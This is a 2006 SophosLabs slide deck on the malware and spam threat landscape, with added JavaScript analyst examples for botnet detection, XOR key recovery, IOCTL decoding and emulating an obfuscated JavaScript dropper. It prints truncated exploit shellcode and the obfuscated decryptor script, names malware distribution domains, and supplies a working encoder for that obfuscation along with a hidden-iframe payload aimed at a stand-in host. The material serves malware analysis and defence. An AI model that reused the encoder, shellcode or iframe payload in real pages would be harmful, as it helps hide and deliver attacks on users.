Changes in the Threat Landscape Beth Jones SophosLabs, Dec 2006
Outline • Overview of the current malware threat • Overview of the current spam threat • A more detailed look at the Threat Landscape • Threat Trends and Techniques • SophosLabs • Looking forward • Summary
SophosLabs Overview of the current malware threat
Threat numbers • 3000 new malicious software threats per month • 300% rise in spam in May 2006
The profile of a virus writer is changing... • Virus writers now have a financial motive (phishing, stealing confidential data, denial-of-service extortion attempts, spam) • More organised criminals see that viruses and Trojan horses can help them make money • They are less likely than the “old school” virus writers to make the mistake of needing to show off to their friends • Law enforcement coordination is required to stop international virus-writing gangs
…to targeted attacks • Although large outbreaks make the headlines, there are also attacks targeted on specific sites or business rivals • Less likely to be noticed than a large outbreak • “Hacked to order” to steal information or resources • Large outbreaks typically target Windows PCs, but that is not necessary for targeted attacks
Changing Threats • Most Trojans have spyware components • 140 Brazilian banking Trojans a day were seen during the summer of 2005 • Total number of banker Trojans with individual IDs is 5500+ • Troj/Bank* – 3818 • Troj/Banc* – 1839 • However, now that we have the Mal/Packer and Mal/Banc behavioural genotypes there are probably many thousands more that we detect proactively • Similar trend with other spyware, e.g. Troj/Torpig-BJ
Keeping out of the news • Don’t want to draw attention • Strong evidence that they ‘test’ first • Easier to steal from 200 victims than from 200,000 • Specific targeted attacks • Easily deployed through spam • Drop malware either directly or from a website • Use a variety of techniques to ‘hide’ themselves • Self-updating • Packing techniques • Malware toolkits for sale
SophosLabs Overview of the current spam threat
By Country Stats (charts) • Malware – Nov 2006, based on all data • Spam – Jul–Sep 2006
Changing face of Spam • Increase in ‘image only’ spam • Widely used for stock ‘pump and dump’ • Now being used for other types (degree, medication etc.) • Shorter campaigns • URLs used in campaigns lasting just a few minutes, to avoid URI-blocking technologies • Abuse of free hosting services: a free page redirects to the spammer’s site • Redirectors (TinyURL etc.): a free URL that again redirects, e.g. kickme.to/spammer.it
Spam Example • Stock ‘pump-and-dump’ campaigns • No URL • Image only • Small image changes introduced to get around checksums
Facts & Figures • Dec 2005 • 135 Alerts (4-5 per day) • 1138 Identities (1-2 every hour) • ~1000 we didn’t alert on (but added) • 68% Trojans • Doesn’t include the ones we detect proactively • >4000 Banker Trojans detected with just 4 Genotype/Family identities • May 2006 • 84% Trojans
Web infection – stage 1 (diagram) • Elements shown: attacker’s PC, email seed-list, SMTP delivery via the ISP, gateway, email server, workstations, attacker’s web server • Stage 1: the spam run that delivers the link to the workstations
Web infection – stage 2 (diagram) • Elements shown: workstations, email server, gateway, ISP, attacker’s PC, attacker’s web server • Stage 2: the workstations fetch the payload from the attacker’s web server
Backdoor Trojans • Client/Server (SubSeven) • Attacker uses a dedicated client program • IRC (Rbot) • Attacker uses a standard IRC client • Web (Bugbear) • Attacker uses an internet browser
Bots • Bot (Zombie, Drone) • A piece of code developed to emulate human behaviour on a network; in computer security the term describes network-spreading threats whose payload lets a remote attacker control the resources of the infected machine • Control most frequently over IRC (TCP port 6667 by default)
Definitions • Botnet (Zombie army) • A group of bots controlled by a single originator/hacker • The botnet owner usually sets up an IRC server that allows authenticated access for specific IRC bot clients bundled with network spreading worms • Botnet server often connected with other IRC botnet servers
Botnets (diagram) • Botnet originator (owner) runs Botnet 1 and Botnet 2 • A botnet user (customer) pays the originator ($) for use of the bots
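The two definition slides above describe bots reporting to an IRC server, most often on TCP 6667. The following is an added example, not from the Sophos slides: a small detection routine run over a constructed connection log that flags an external server to which several internal hosts open IRC-port sessions, which is the botnet pattern rather than one person using IRC. The log format, the port list beyond 6667, the 10.0.0.0/8 internal range and all addresses (documentation ranges) are assumptions.

```javascript
// Added example (not from the Sophos slides): flag an IRC-style C&C server from
// a constructed connection log. Log line format is an assumption:
// "<timestamp> <src_ip> <dst_ip> <dst_port> <proto>".

// 6667 is the IRC default named on the slide; the others are common IRC ports (assumption).
const IRC_PORTS = new Set([6666, 6667, 6668, 6669, 7000]);

// Constructed sample log. 10.0.0.x are internal workstations; 198.51.100.7 and
// 203.0.113.x are RFC 5737 documentation addresses, not real hosts.
const SAMPLE_LOG = `
2006-12-01T09:00:01 10.0.0.11 198.51.100.7 6667 tcp
2006-12-01T09:00:02 10.0.0.12 198.51.100.7 6667 tcp
2006-12-01T09:00:03 10.0.0.13 198.51.100.7 6667 tcp
2006-12-01T09:00:04 10.0.0.14 198.51.100.7 6667 tcp
2006-12-01T09:00:05 10.0.0.15 203.0.113.10 80 tcp
2006-12-01T09:00:06 10.0.0.16 203.0.113.44 6667 tcp
2006-12-01T09:00:07 10.0.0.11 198.51.100.7 6667 tcp
`;

function parseLog(text) {
  return text.trim().split('\n').filter(Boolean).map(line => {
    const [ts, src, dst, port, proto] = line.trim().split(/\s+/);
    return { ts, src, dst, port: Number(port), proto };
  });
}

// Internal range is an assumption for the sample (10.0.0.0/8).
function isInternal(ip) { return ip.startsWith('10.'); }

// Group outbound IRC-port connections by destination and count distinct internal
// sources. Many workstations converging on one external IRC server is the botnet
// pattern; a single host on 6667 may just be a person on IRC, so it is not flagged.
function findBotnetCandidates(records, minClients = 3) {
  const byServer = new Map();
  for (const r of records) {
    if (r.proto !== 'tcp' || !IRC_PORTS.has(r.port)) continue;
    if (!isInternal(r.src) || isInternal(r.dst)) continue;
    if (!byServer.has(r.dst)) byServer.set(r.dst, new Set());
    byServer.get(r.dst).add(r.src);
  }
  const hits = [];
  for (const [server, clients] of byServer) {
    if (clients.size >= minClients) hits.push({ server, clients: [...clients].sort() });
  }
  return hits.sort((a, b) => b.clients.length - a.clients.length);
}

const candidates = findBotnetCandidates(parseLog(SAMPLE_LOG));
console.log(JSON.stringify(candidates, null, 2));
```

On the sample, only 198.51.100.7 is reported (four distinct clients); the lone workstation talking to 203.0.113.44 stays below the threshold. In practice the threshold and the port list are tuned to the site, and a hit is a lead for packet capture, not a verdict.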
Rootkits • A rootkit is a set of tools (programs, utilities) used by an attacker in order to maintain access to a compromised system without their activity being detected by the system administrator • Rootkits act by denying the listing of certain elements such as processes, files, registry entries and TCP ports, giving the user false confidence that the machine has not been compromised
Normal system (diagram) • Application → System → Disk
Rootkit installed (diagram) • Application → Rootkit → System → Disk (the rootkit sits between the application and the system, filtering what is reported)
Changes in techniques • Malware authors are using newer or different tactics to try and maintain their element of surprise. • Techniques include • Obfuscation techniques • Packers/wrappers • Exploits
Obfuscation techniques • Packing • Aggressive development of packers & cryptors • Junk data/code • Added to make analysis more difficult • Code Injection • Masquerade as another process. Bypass local security (client firewall) • Persistence • Twinning procedures
Obfuscation – Code Injection • Masquerade as another process • Bypass local security (client firewall) • Change XOR key: 255 “variants” (^0x1b) – Troj/Dloadr-AMQ (Sep 2006)
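The slide’s point is that one downloader family ships the same strings under up to 255 different single-byte XOR keys, so signatures on the encoded bytes miss most variants. The following is an added example, not from the Sophos slides or the Troj/Dloadr-AMQ sample: an analyst-side key recovery by known-plaintext search. The configuration blob, the separator, the drop name, the example.invalid host and the choice of 0x1b as the sample key (the value the slide shows) are all constructed.

```javascript
// Added example, not from the Sophos slides: recover a single-byte XOR key from
// an obfuscated downloader configuration by known-plaintext search. The blob,
// key and crib are constructed for illustration.

function xorBytes(bytes, key) {
  return Uint8Array.from(bytes, b => b ^ key);
}

// Constructed plaintext config: download URL and drop name, '|' separated.
// example.invalid is a reserved name (RFC 2606), not a real server.
const PLAINTEXT_CONFIG = 'http://example.invalid/load.exe|svchost32.exe';
const SAMPLE_KEY = 0x1b; // the key value shown on the slide, used here as the sample
const OBFUSCATED_CONFIG = xorBytes(Buffer.from(PLAINTEXT_CONFIG, 'latin1'), SAMPLE_KEY);

// Try every key from 0x00 (unobfuscated) to 0xff and keep those whose output
// contains the crib. A downloader that fetches over HTTP must carry "http://"
// somewhere in its decoded config, so that string is a safe crib even when
// nothing else about the variant is known.
function recoverXorKey(blob, crib = 'http://') {
  const hits = [];
  for (let key = 0; key <= 0xff; key++) {
    const text = Buffer.from(xorBytes(blob, key)).toString('latin1');
    if (text.includes(crib)) hits.push({ key, text });
  }
  return hits;
}

// Split the recovered config into the fields an analyst pivots on.
function parseConfig(text) {
  const [url, dropName] = text.split('|');
  return { url, dropName };
}

for (const h of recoverXorKey(OBFUSCATED_CONFIG)) {
  console.log(`key 0x${h.key.toString(16).padStart(2, '0')} ->`, parseConfig(h.text));
}
```

Returning every matching key rather than the first matters when the crib is short: a one-line config on a real sample may match under more than one key, and the analyst picks by eye. Once the key is known, a detection can be written on the decoded form, which is what survives the 255 re-keyed variants.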
Obfuscation – Code Injection • Browser Helper Objects (BHO) • Code “injection”? (well, silent loading at least) • Core of adware applications • (video: cimuz.avi) • BHO – sniff HTTP traffic • Often used in banking Trojans
Obfuscation – Persistence • Payloads to maintain persistence, e.g.: • Process termination • Process “twinning” • (video: zlob-twin.avi)
Exploit Usage • WebAttacker (demo; video: wa-banker.avi) • OS & browser • IRC bots: LSASS (MS04-011), SRVSVC (MS06-040), RPC-DCOM (MS04-012), WKS (MS03-049) (CAN-2003-0812), PNP (MS05-039) and ASN.1 (MS04-007) • Troj/Animoo • Exp/WMF • ADODB (Psyme)
Troj/Tibs (diagram) • Obfuscated JS delivering: Exp/WMF, Exp/CodeBase, WebViewFolderIcon, ADODB Stream, Exp/Ani
Full Circle! (infection-chain diagram) • Sites: http://frekasele.info, http://west-best.info, http://ariec.org • Stages named: Guru/JSShell, Troj/Tibs, Daxctle, Dload-AQE, Tool888 PUA, Dload (Mal/Packer), Troj/LDPinch, Dload (injected DLL), Backdoor • http://www.perfectcodec.com – registered 13th Nov – Troj/Zlob !!! • Webroot: hardcore porn, “Require new Codec to view movie”
Troj/LDPinch • Password stealer, 2004-6, very active • Exfiltrates by HTTP POST, Base64-encoded • Collects: OS details, process list, SMTP configuration, MAPI and POP3 credentials, … …
ADODB - Psyme • “Utility” script • used in many campaigns • Downloaders, backdoors etc • Key part of infection mechanism • Spam URI to ADODB exploit
Troj/Proxy-EN • Installs stealthing proxy Trojan (via dropper) • PE: %sysdir%\protector.exe • SYS: HKLM\SYSTEM\CurrentControlSet\Services\ntio256 – ImagePath = \??\C:\WINDOWS\System32\ntio256.sys, DisplayName = "Input and output operations" • Device name: \\.\poofpoof • IO control codes (3): 0x220400 – registry, 0x220404 – files, 0x22040c – process
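The three control codes on the slide are the user-mode interface to the stealth driver: the proxy component asks the driver to hide a registry key, a file or a process by sending one of them to \\.\poofpoof. The following is an added example, not from the Sophos slides or the sample: decoding those codes into the fields of the Windows CTL_CODE macro (device type, access, function number, buffering method), which is the first thing an analyst does before reversing the driver’s dispatch routine. The macro layout is Microsoft’s documented one; the purpose labels are the slide’s; the single-entry device-type table is an assumption sufficient for this sample.

```javascript
// Added example, not from the Sophos slides: decode the Proxy-EN driver's
// IOCTL codes into CTL_CODE fields.
// CTL_CODE(DeviceType, Function, Method, Access) =
//   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method

const METHODS = ['METHOD_BUFFERED', 'METHOD_IN_DIRECT', 'METHOD_OUT_DIRECT', 'METHOD_NEITHER'];
const ACCESS = ['FILE_ANY_ACCESS', 'FILE_READ_ACCESS', 'FILE_WRITE_ACCESS',
                'FILE_READ_ACCESS|FILE_WRITE_ACCESS'];
// Only the device type this sample needs (assumption: a fuller table would list
// the FILE_DEVICE_* constants). Third-party drivers conventionally use 0x22.
const DEVICE_TYPES = { 0x22: 'FILE_DEVICE_UNKNOWN' };

function decodeIoctl(code) {
  const deviceType = (code >>> 16) & 0xffff;
  const access = (code >>> 14) & 0x3;
  const functionCode = (code >>> 2) & 0xfff;
  const method = code & 0x3;
  return {
    code: '0x' + code.toString(16),
    deviceType,
    deviceTypeName: DEVICE_TYPES[deviceType] || ('0x' + deviceType.toString(16)),
    access: ACCESS[access],
    functionCode,
    method: METHODS[method],
    // Function codes below 0x800 are reserved for Microsoft's own drivers, so a
    // third-party driver using 0x100..0x103 is a small oddity worth noting.
    usesReservedFunctionRange: functionCode < 0x800,
  };
}

// The slide's mapping of each control code to what the rootkit hides.
const PROXY_EN_IOCTLS = { 0x220400: 'registry', 0x220404: 'files', 0x22040c: 'process' };

function describeDriverInterface(table) {
  return Object.entries(table).map(([code, purpose]) => ({ purpose, ...decodeIoctl(Number(code)) }));
}

for (const entry of describeDriverInterface(PROXY_EN_IOCTLS)) console.log(entry);
```

All three decode to FILE_DEVICE_UNKNOWN, FILE_ANY_ACCESS and METHOD_BUFFERED with consecutive function numbers 0x100, 0x101 and 0x103, which is the shape of a hand-written control interface rather than a standard Windows one: METHOD_BUFFERED means the hide request (a key path, file name or PID) arrives in the system buffer, so the dispatch routine for IRP_MJ_DEVICE_CONTROL is where to look for the hiding logic.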
Obfuscated JavaScripts • Simple • “Kits” available • Not indicative of malicious • But certainly suggestive! • Various mechanisms • Char substitution • Unescaped • StrReverse • … … • Emulate? • Performance considerations
Sample from the slide (both snippets are truncated on the slide; the ellipses are as presented):
shellcode = unescape("%u4343"+"%u4343"+"%u4343" +
    "%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
    "%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
    "%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +
    "%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
function decrypt_p(x){
    var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
        t=Array(63,58,12,54,53,10,24,87,45,56,12 …);
    for(j=Math.ceil(l/b); j>0; j--){
        r='';
        for(i=Math.min(l,b); i>0; i--,l--){
            w|=(t[x.charCodeAt(p++)-48])<<s;
            if(s){ r+=String.fromCharCode(165^w&255); w>>=8; s-=2 }
            else{ s=6 }
        }
        document.write(r)
    }
}
decrypt_p("WsuvPNgVPF@s3JX4jLixWtNtKj ...")
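The slide asks “Emulate?”, and the decrypt_p() sample shows why it pays: the second stage is reconstructed only at run time, from a custom 6-bit alphabet (the t[] table), a 24-bit little-endian pack and an XOR with 165, and handed straight to document.write(). The following is an added example, not the malware’s code and not from the Sophos slides: a stand-alone port of that scheme that returns the decoded stage instead of writing it into the page, a matching encoder used only to build a sample, and a converter that turns an unescape("%u....") shellcode string into bytes for a disassembler. The alphabet, the sample payload and the encoder are constructed; the slide’s real table and ciphertext are elided and are not reproduced.

```javascript
// Added example (not the malware's code from the slide): a port of the
// decrypt_p() scheme with document.write() replaced by a returned string, plus
// a converter for unescape("%u....") shellcode. Alphabet, XOR constant usage,
// encoder and sample payload are constructed; the slide's table is elided.

// Constructed 64-symbol alphabet. Every symbol lies in char codes 48..122 so
// that (charCode - 48) indexes the table exactly as the original t[] does.
const ALPHABET = 'zyxwvutsrqponmlkjihgfedcba[@ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210';
const XOR_BYTE = 165;            // the 165 in String.fromCharCode(165^w&255)

// Lookup table in the original's shape: index = charCode - 48, value = 6-bit symbol.
const T = new Array(75).fill(-1);
for (let v = 0; v < ALPHABET.length; v++) T[ALPHABET.charCodeAt(v) - 48] = v;

// Faithful port of decrypt_p(): same accumulator w, same shift schedule
// (s = 0,6,4,2,0,...), same 1024-char chunking. Four symbols yield three bytes,
// packed little-endian (first symbol = low six bits of the first byte).
function decryptP(x) {
  let l = x.length, p = 0, s = 0, w = 0, out = '';
  const b = 1024;
  for (let j = Math.ceil(l / b); j > 0; j--) {
    let r = '';
    for (let i = Math.min(l, b); i > 0; i--, l--) {
      const v = T[x.charCodeAt(p++) - 48];
      if (v === undefined || v < 0) throw new Error('symbol outside alphabet at ' + (p - 1));
      w |= v << s;
      if (s) { r += String.fromCharCode(XOR_BYTE ^ (w & 255)); w >>= 8; s -= 2; }
      else { s = 6; }
    }
    out += r;                    // original: document.write(r)
  }
  return out;
}

// Inverse of the above (constructed; the kit's encoder is not on the slide):
// XOR each byte, pack three bytes into a 24-bit little-endian word, emit four
// 6-bit symbols low bits first. A 1- or 2-byte tail gives 2 or 3 symbols.
function encryptP(text) {
  let out = '';
  for (let i = 0; i < text.length; i += 3) {
    const chunk = text.slice(i, i + 3);
    let n = 0;
    for (let k = 0; k < chunk.length; k++) n |= ((chunk.charCodeAt(k) & 255) ^ XOR_BYTE) << (8 * k);
    const symbols = Math.ceil(chunk.length * 4 / 3);
    for (let k = 0; k < symbols; k++) out += ALPHABET[(n >> (6 * k)) & 63];
  }
  return out;
}

// Convert an unescape("%uXXXX...") string to raw bytes for a disassembler.
// Each %uXXXX is one UTF-16 code unit stored low byte first; %XX is one byte.
function unescapeToBytes(s) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m[1] !== undefined) { const v = parseInt(m[1], 16); bytes.push(v & 255, v >> 8); }
    else if (m[2] !== undefined) bytes.push(parseInt(m[2], 16));
    else bytes.push(m[3].charCodeAt(0) & 255);
  }
  return Uint8Array.from(bytes);
}

// Constructed second stage standing in for the slide's elided payload.
const SECOND_STAGE = '<iframe src="http://example.invalid/x.htm" width=0 height=0></iframe>';
const CIPHERTEXT = encryptP(SECOND_STAGE);
console.log('ciphertext :', CIPHERTEXT);
console.log('recovered  :', decryptP(CIPHERTEXT));
console.log('shellcode  :', Buffer.from(unescapeToBytes('%u4343%u4343%u4343%ua3e9%u0000%u5f00')).toString('hex'));
```

Two practical notes. Running the original script in a real browser would execute the second stage; the port above keeps the algorithm byte-for-byte but swaps the sink, which is the whole trick of emulation, and the alphabet table is the only thing that changes from kit to kit. Second, the slide’s shellcode prefix decodes to six 0x43 bytes (inc ebx, a common sled filler) followed by E9 A3 00 00 00, a relative jmp, which is the usual jmp/call/pop opening of position-independent shellcode.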
Targeted Attacks • Exp/1Table (incl. MS06-027) • Malformed Word documents • Drop various backdoor & PWS Trojans • Exp/MS06-048 • Malformed PowerPoint presentations • CVE-2006-3590 • Drop Troj/Bifrose backdoor • Eastern origin, politically themed
Games • MMORPGs • Massively multiplayer online role-playing games • Financial scope • Young demographic • Real value (Lineage: >4m subscribers) • Phishing (since ~2002) • Trojans (since ~2003) • W32/PrsKey-A (Oct 2005) – “Priston’s Tale” keylogger, reports via Yahoo! email • W32/Looked (2005-6) – “Lineage” & “WoW”; prepender, password stealer, keylogger
Games • Mechanism? • Steal login credentials • Transfer items/goods within game • Sell for real cash • Banned by game manufacturers • Example prices: Cleric $200+, Priest $355+
Games • Denial of Service • Second Life, ‘Grey Goo’ • Next step? • Spyware (EULA) • API advancements
Who are SophosLabs? • A global group within Sophos engineering • 53 people • In 4 countries
What do SophosLabs do? Protect Sophos customers 24/7